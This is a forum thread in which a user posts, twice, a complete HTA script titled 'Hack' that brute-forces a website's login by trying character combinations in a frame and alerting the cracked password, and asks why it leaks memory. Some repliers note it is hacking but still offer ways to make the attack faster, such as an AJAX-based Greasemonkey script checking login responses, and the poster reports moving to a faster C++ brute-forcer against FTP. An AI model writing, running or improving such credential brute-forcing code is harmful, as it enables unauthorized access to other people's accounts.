Hi all, I made an HTA file. When I use task manager to look at the amount of memory it is using, it steadily increases as the program continues. If I remove the line document.frames["website"].document.getElementById("ctl00_MainContentPlaceHolder_LogonButton").click(); HTML: , the memory leak goes away. Why is this line causing the memory leak? Thanks in advance. P.S. I removed some private information so the application may not work properly when run. <?xml version= "1.0"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd"> <html xmlns= "http://www.w3.org/1999/xhtml"> <head> <title>Hack</title> <HTA:APPLICATION APPLICATIONNAME="Hack" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize" > <script type= "text/javascript"> var firstTime = true; var username = ""; var password = ""; var passwordArrayIndices = [0]; var chars = ["a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F", "g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R", "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X", "y", "Y", "z", "Z", " ", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "!", "@", "#", "$", "%", "^", "&", "*", "(", ")"]; passwordArrayIndices[0] = 0; function getUsername() { username = prompt("Username to hack:", ""); } function findPassword() { for (i = passwordArrayIndices.length - 1; i >= 0; i--) { if (passwordArrayIndices[i] == chars.length) { if (i == 0) { for (j = passwordArrayIndices.length; j >= 0; j--) { passwordArrayIndices[j] = 0; } } else { passwordArrayIndices[i] = 0; passwordArrayIndices[i - 1]++; } } } for (i = 0; i < passwordArrayIndices.length; i++) { password += chars[passwordArrayIndices[i]]; } if (password.match("&#") != null) { checkLogin(); } else { document.frames["website"].document.getElementById("ctl00_MainContentPlaceHolder_UsernameBox").value = username; document.frames["website"].document.getElementById("ctl00_MainContentPlaceHolder_PWBox").value = password; document.frames["website"].document.getElementById("ctl00_MainContentPlaceHolder_LogonButton").click(); } } function checkLogin() { if (!firstTime) { if (document.frames["website"].location.href == "http://www.example.com/default.aspx") { alert("Username: " + username + "\nPassword: " + password); } else { password = ""; passwordArrayIndices[passwordArrayIndices.length - 1]++; findPassword(); } } firstTime = false; } </script> </head> <frameset rows= "1" cols= "1" onload= "getUsername(); findPassword();"> <frame frameborder= "0" id= "website" src= "http://www.example.com/Login.aspx" onload= "checkLogin();" /> </frameset> </html> HTML:
is there any inline code for the ctl00_MainContentPlaceHolder_LogonButton or events? whats the onclick event doing? even if that's not the case, you are loading a site into an iframe, since its brute forcing - it will do so over and over and over again. get a tool called 'drip' -> it is essentially something that allows you to do detection of leaks - run the frame source through it a few times, including reloading (memory leaks go through page reloads). if the frame itself is the cause of the leak - then there is very little you can do. you can run things in a browser with a better garbage collector (firefox 3+, safari 3+, even IE8... although isn't HTA ie only?) another thing - you can try this via a greasemonkey script instead, using a framework that has a garbage collector and logging in via ajax / checking response text - this will actually help you avoid parsing and loading the page every single time. of course, considering you are actually hacking, i think its a bit ballsy coming up here and asking for help with your new account and a single post?
Is it possible that the memory leak is because of the target website and not of yours, during the process of the login? Have you tried to run the script against a different website?
Hi guys, I modified the code so that you guys can try it. The webpage in the frame is a simple webpage I made hosted on my server. It still leaks. I think it has something to do with the interactions between Javascript and DOM. Thanks again <?xml version= "1.0"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd"> <html xmlns= "http://www.w3.org/1999/xhtml"> <head> <title>Hack</title> <HTA:APPLICATION APPLICATIONNAME="Hack" SCROLL="yes" SINGLEINSTANCE="yes" WINDOWSTATE="maximize" > <script type= "text/javascript"> var firstTime = true; var username = ""; var password = ""; var passwordArrayIndices = [0]; var chars = ["a", "A", "b", "B", "c", "C", "d", "D", "e", "E", "f", "F", "g", "G", "h", "H", "i", "I", "j", "J", "k", "K", "m", "M", "n", "N", "o", "O", "p", "P", "q", "Q", "r", "R", "s", "S", "t", "T", "u", "U", "v", "V", "w", "W", "x", "X", "y", "Y", "z", "Z", " ", "1", "2", "3", "4", "5", "6", "7", "8", "9", "0", "!", "@", "#", "$", "%", "^", "&", "*", "(", ")"]; passwordArrayIndices[0] = 0; function getUsername() { username = prompt("Username to hack:", ""); } function findPassword() { for (i = passwordArrayIndices.length - 1; i >= 0; i--) { if (passwordArrayIndices[i] == chars.length) { if (i == 0) { for (j = passwordArrayIndices.length; j >= 0; j--) { passwordArrayIndices[j] = 0; } } else { passwordArrayIndices[i] = 0; passwordArrayIndices[i - 1]++; } } } for (i = 0; i < passwordArrayIndices.length; i++) { password += chars[passwordArrayIndices[i]]; } if (password.match("&#") != null) { checkLogin(); } else { document.frames["website"].document.getElementById("ctl00_MainContentPlaceHolder_UsernameBox").value = username; document.frames["website"].document.getElementById("ctl00_MainContentPlaceHolder_PWBox").value = password; document.frames["website"].document.getElementById("ctl00_MainContentPlaceHolder_LogonButton").click(); } } function checkLogin() { if (!firstTime) { if (document.frames["website"].location.href == "http://testHTA.no-ip.org/test2.html") { alert("Username: " + username + "\nPassword: " + password); } else { password = ""; passwordArrayIndices[passwordArrayIndices.length - 1]++; findPassword(); } } firstTime = false; } </script> </head> <frameset rows= "1" cols= "1" onload= "getUsername(); findPassword();"> <frame frameborder= "1" id= "website" src= "http://testHTA.no-ip.org/test.html" onload= "checkLogin();" /> </frameset> </html> Code (markup):
I need to find a leak detector that can open HTA files because in the normal Internet Explorer, cross-site scripting is not allowed (it says "Access denied.").
there is nothing in your code to cause a leak at a glance, you don't store references to the dom, the dom certainly won't reference you back - you are essentially reloading their page nnnn number of times and the garbage collector is not keeping up--the leak is inherently on the source site and not in your script, imo. seriously, try greasemonkey, its a sandboxed environment and may do you far better service here.
depends on the browser and the target page, presence of a framework and whatnot. some frameworks/GC sport a very systematic approach to GC, recording all references, assignments and variables and having an unload event that cleans them up. this does not mean they always work, depends on how the framework is being used... for instance, if i do this in mootools: $("mydiv").set("friendDiv", $("myFriend")); // property references $("myFirend") as object, native GC will work. document.getElementById("mydiv").setAttribute("friendDiv", $("myfriend")); // won't be cleaned up by the mootools GC as the element was not extended via mootools. IE won't clean it either. PHP: the examples are countless in how you can create leaks... i don't know of a way to run the native browser garbage collector manually - and you have yet to say what browser you use anyway. which is why my suggestion was to run this via ajax in a greasemonkey script and then simply look at the response.text for bits you know are unique for the logged in user will be a much better solution - ajax does NOT load into the dom and no js will run again etc, you don't update any frames so there shouldn't be any significant leaks or leaks at all... now, my understanding of the way greasemonkey works is it that it injects your javascript into the page you are visiting so it will have all the local privileges, including XHR, and use of all of the site's js functions and dom access. what more do you want?
Hi again, I've decided to carry out this project using a different approach. I've decided to write a C++ program to do what this HTA does but through FTP. It works and it doesn't leak . It's also faster since I don't have to load a web page each time. Thanks for all of your help.